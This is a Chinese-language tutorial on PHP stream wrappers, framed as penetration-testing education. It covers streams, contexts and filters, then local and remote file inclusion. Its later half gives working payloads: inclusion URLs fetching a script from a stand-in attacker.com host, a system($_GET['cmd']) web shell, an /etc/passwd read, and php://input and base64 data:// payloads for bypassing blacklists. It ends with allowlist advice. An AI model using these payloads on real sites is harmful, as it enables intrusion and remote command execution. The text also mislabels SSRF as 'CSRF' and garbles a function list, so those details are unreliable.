PHP Stream Wrappers的利用技巧是怎樣的

PHP Stream Wrappers的利用技巧是怎樣的，相信很多沒有經驗的人對此束手無策，為此本文總結了問題出現的原因和解決方法，通過這篇文章希望你能解決這個問題。

流（Streams）這個概念是在php4.3引進的，是對流式數據的抽象，用于統一數據操作，用于統一數據操作，比如文件數據、網絡數據、壓縮數據等。簡單點講，流就是表現出流式數據行為的資源對象。

了解 IT 中的流

當不同的介質之間有數據交互的時候，就使用流來實現。數據源和目標可以是文件，TCP/IP或UDP網絡連接，標準輸入和輸出，文件服務器上的文件傳輸或文件存檔過程。即使這些流看起來彼此差異很大，但它們卻有一個共同的線程：它們基本上都是讀寫的過程。你可以將數據從源寫入到目標，也可以將從源讀取的數據傳輸到目標。大致過程如下：

連接建立

數據讀取

數據寫入

連接結束

即使基本操作是讀寫，也需要執行其他操作才能訪問Web服務器或存檔文件，或是執行簡單的輸入和輸出過程，以及通過TCP/IP或UDP建立連接。

流操作中的通用函數

我們可以通過PHP中的一些通用函數與流進行交互：

fileopenfwritefclosefile_get_contentsfile_put_contents

在PHP中，你可以使用通用函數來執行各種流操作，而無需使用單獨的函數，從而使整個過程更加簡單。

直到今天，這些函數仍是流概念的主要部分并用于文件讀寫過程。我們現在可以在PHP中使用wrapper（包裝器）來執行各種流處理，例如HTTP，FTP，SOCKET進程和標準輸入/輸出進程。

如果要使用流，則需要以特定格式指定其類型和目標。我們將在通用函數中使用的流類型定義如下：

<wrapper>://<target>

<wrapper>占位符用于指定我們將使用的流類型，如File，FTP，PHPOUTPUT，PHPINPUT，HTTP或SSL。

如果你是PHP程序員，你應該熟悉以下代碼。它會讀取some.txt文件并打印其內容。

<?php
$handle = fopen("some.txt","rb");
while(feof($handle)!==true) {
   echo fgets($handle);
}

在代碼中，我們使用file://system wrapper調用fopen通用流函數。從技術上講，上面的代碼與以下代碼完全相同：

<?php
$handle = fopen("file://some.txt","rb");
while(feof($handle)!==true) {
   echo fgets($handle);
}

由于流函數中的默認包裝器是file://，因此如果要使用它，則不必進行指定。

你可以使用以下代碼列出允許使用的包裝器。

<?php
   print_r(stream_get_wrappers());

流上下文概念

對于大多數用例，流函數的默認用法可能已經足夠。但是在某些情況下，你需要的不僅僅是默認用法。

<?php
file_get_contents(“http://www.example.com/news.php”);

我們假設可以使用file_get_contents命令來讀取http://www.example.com/news.php上的新聞。但是，如果該網站需要某種形式的身份驗證才能訪問其內容呢？在這種情況下，你可以使用流上下文（Stream-Context）規范使用可選參數自定義流行為。

以下是一段流上下文的示例代碼：

<?php
   $postdata = '{"username":"ziyahan"}'
   $opts = array('http' =>   array(
           'method' => 'POST',
           'header' => 'Content-type: application/json;charset=utf-8;\r\n'.
               'Content-Length: '.mb_strlen($postdata),
           'content' => $postdata
       )
   );

   $context = stream_context_create($opts);
   $response = file_get_contents('http://www.example.com/news.php', false,
   $context);

如上所示，流上下文實際上是一個數組。上面的鍵值表示將在上下文中使用的包裝器類型（本例中為HTTP）。每個包裝器都有各自的上下文參數。你可以在PHP文檔中閱讀有關它們的更多信息。

PHP 流過濾器

以上我們對流的讀寫過程已有了一個初步的了解。流包裝器的主要優點是可以在讀/寫過程中即時的修改，更改或刪除數據。

PHP為我們提供了一些流過濾器（string.toupper，string.tolower，string.rot13和string.strip_tags）。除此之外，還可以使用各種自定義過濾器。

我們可以使用stream_append_filter函數在流上應用過濾器。例如，下面的過濾器會將所有讀取的句子轉換為大寫：

<?php
   $handle = fopen('file://data.txt','rb');
   stream_filter_append($handle, 'string.toupper');
   while(feof($handle)!==true) {
       echo fgets($handle);
   }
   fclose($handle);

在data.txt中讀取的信息將以大寫形式顯示在屏幕上。

你還可以使用php://filter wrapper向流添加過濾器：

<?php
   $handle = fopen('php://filter/read=string.toupper/resource=data.txt','rb');

   while(feof($handle)!==true) {
       echo fgets($handle);
   }
   fclose($handle);

流開始傳輸時將調用該方法。與第一個示例相比，該方法對于之后不允許過濾器附件的函數（如file()和fpassthru()）更為可行。

你可以使用過濾器進行編碼（rot13，base64）或文件壓縮和提取。

除了PHP和預定義的包裝器之外，你還可以使用第三方包裝器（如Amazon S3或Dropbox），并為特定操作編寫自定義包裝器。

在此之前我們給出的示例屬于本地文件包含（LFI）類目，其中包括將目標系統中的文件包含在代碼中以提取系統的數據。

在遠程文件包含中 PHP Wrappers 的使用

除了LFI之外，還可以遠程向Web應用注入代碼，即遠程文件包含（RFI）。

以下是一段示例代碼：

<?php
   include($_GET[“go”].”.php”);

使用這段代碼，你可以使用鏈接瀏覽網站，例如www.example.com/?go=contact和www.example.com/?go=products。

但是，這段代碼有一個根本的缺陷。假設在遠處的某個服務器中有一個名為malscript.txt的文件，該文件包含以下代碼：

<?php
   phpinfo();

這是包含以上代碼文件的URL：http://www.attacker.com/malscript.txt

然后，攻擊者將調用以下URL加載該惡意腳本。

www.example.com/?go=http%3A%2F%2Fwww.attacker.com%2Fmalscript.txt
<?php
   include(“http://www.attacker.com/malscript.txt.php”);

開發人員添加的.php擴展名在此示例中顯示為barrier（屏障）。在RFI攻擊中，想要繞過它非常的容易。

這是攻擊者提供的URL：http://www.attacker.com/malscript.txt?q=。這是攻擊者為了執行攻擊而需要訪問的完整URL：

www.example.com/?go=http%3A%2F%2Fwww.attacker.com%2Fmalscript.txt%3Fq%3D
<?php
   include(“http://www.attacker.com/malscript.txt?q=.php”);

使用攻擊URL中的“?q=”字符繞過.php barrier。這只是一個例子，在多數情況下你可以使用適當的擴展名托管文件。這個技巧對于服務器端請求偽造攻擊（CSRF）也非常有用。

.txt文件從遠程服務器被注入到PHP函數中，文本文件中的代碼將作為網站代碼的一部分被執行。phpinfo()函數將為我們顯示服務器的敏感信息。

在該示例當中，我們僅僅只是讀取了服務器的信息。如果我們將其中的代碼更改為其它PHP命令又會發生什么呢？如下所示：

<?php
   system(“uname -a”)

可以看到，現在我們可以利用RFI執行系統命令了。此代碼允許攻擊者通過將其作為GET參數提供，來執行他們想要執行的任何命令：

<?php
   system($_GET[“cmd”]);

我們再次使用與前面示例相同的腳本URL：http://www.attacker.com/malscript.txt?q=。但這次我們可以提供一個系統命令作為CMD的GET參數：

www.example.com/?cmd=uname+-a&go=http%3A%2F%2Fwww.attacker.com%2Fmalscript.txt?q=

此時，服務器可以根據攻擊者的請求運行各種命令。

如果無法使用查詢字符串覆蓋 .php extension barrier，則可以使用該擴展名。你需要為此創建一個PHP文件，并在將其上傳到服務器之前包含以下代碼。

以下是backdoor.php文件中的內容：

<?php
   echo '<?php system($_GET["cmd"]);?>';

因此，攻擊者需要提供的新鏈接為：http://www.attacker.com/backdoor。這是攻擊者為了執行攻擊而需要訪問的鏈接：

http://example.com/?cmd=cat%20/etc/passwd&go=http%3A%2F%2Fwww.attacker.com%2Fbackdoor

PHP將執行此代碼：

<?php
   include(“http://www.attacker.com/backdoor.php”);

使用 Stream Wrappers 繞過黑名單列表

如果開發人員開始采取防御措施并過濾掉了一些輸入，那么我們又該怎么辦？例如，不允許在參數中使用http://。

其實解決方案很簡單，你可以使用其他選項，例如php://input wrapper，而不是已過濾的http:// wrapper。

在利用RFI漏洞時，如何使用包裝器來獲取POST請求主體的輸入并將其發送給PHP編譯器呢？

以下是一個請求示例：

POST http://www.example.com?go=php://input%00 HTTP/1.1
Host: example.com
Content-Length: 30

<?php system($_GET["cmd"]); ?>

如上所示，即使過濾掉了http://和file:// wrapper，我們仍然可以使用php://input wrapper來利用此漏洞。

即使開發人員將php:// wrapper和允許系統級命令執行的其他PHP命令（如system，cmd）列入黑名單，我們仍然有辦法覆蓋barriers。在這種情況下，我們可以使用data:// wrapper，其作用是將傳遞給它的輸入作為類型和值傳遞給PHP流函數。

以上的代碼為：

<?php
 &ampnbsp; system($_GET[“cmd”]);

如果允許使用data:// wrapper，攻擊者只需使用以下代碼而無需托管外部文件：

data://text/plain, <?php system($_GET["cmd"]);

這是最終請求的URL編碼版本：

data%3a%2f%2ftext%2fplain%2c+%3c%3fphp+system(%24_GET%5b%22cmd%22%5d)%3b+%3f%3e
http://www.example.com/?go=data%3a%2f%2ftext%2fplain%2c+%3c%3fphp+system(%24_GET%5b%22cmd%22%5d)%3b+%3f%3e

使用cmd參數，任何代碼請求都將被執行。例如，想要獲取系統信息，可以使用uname -a命令，但必須先對其進行編碼。

用于攻擊的URL：

http://www.example.com/?cmd=uname+-a&go=data%3a%2f%2ftext%2fplain%2c+<%3fphp+system(%24_GET%5b"cmd"%5d)%3b+%3f>

前面我們已經假設開發人員將system和cmd等關鍵字列入了黑名單中。那么，我們有什么可以代替的解決方案呢？

幸運的是data:// wrapper支持base64和rot13編碼。因此，你必須對將用于利用base64中漏洞的PHP代碼進行編碼，并發出以下請求：

PHP code:

<?php
   system($_GET[“cmd”]);

這是漏洞利用的base64編碼版本。PHP將對其進行解碼并執行。

PD9waHANCnN5c3RlbSgkX0dFVFsiY21kIl0pOw0KPz4=

你將發出請求的URL：

http://www.example.com/?cmd=uname+-a&go=data://text/plain;base64,PD9waHANCnN5c3RlbSgkX0dFVFsiY21kIl0pOw0KPz4=

go參數下的腳本代碼（base64編碼）已經準備好使用“cmd”參數在操作系統級別執行命令。

這里主要介紹了一些PHP Stream Wrappers在滲透測試中的利用技巧，以及讓大家對此有了更為深入的了解。這些包裝器也可以用來繞過某些安全過濾器。正如上面例子中所說的那樣，由于攻擊范圍不斷增加，使用黑名單幾乎已不可能確保安全性。將接收的函數和文本輸入列入白名單而不是將關鍵字（如http://，file://，php://，system和cmd）列入黑名單，并在每次發現新的攻擊媒介時及時的更新它們將更為有效。可以說，效率是保護Web應用程序安全性的關鍵。

除此之外，你還可以禁用遠程文件包含功能，并且永遠不要讓用戶在可能實現遠程文件包含和執行代碼的函數中控制輸入，例如require，include，require_once，include_once等。

看完上述內容，你們掌握PHP Stream Wrappers的利用技巧是怎樣的的方法了嗎？如果還想學到更多技能或想了解更多相關內容，歡迎關注億速云行業資訊頻道，感謝各位的閱讀！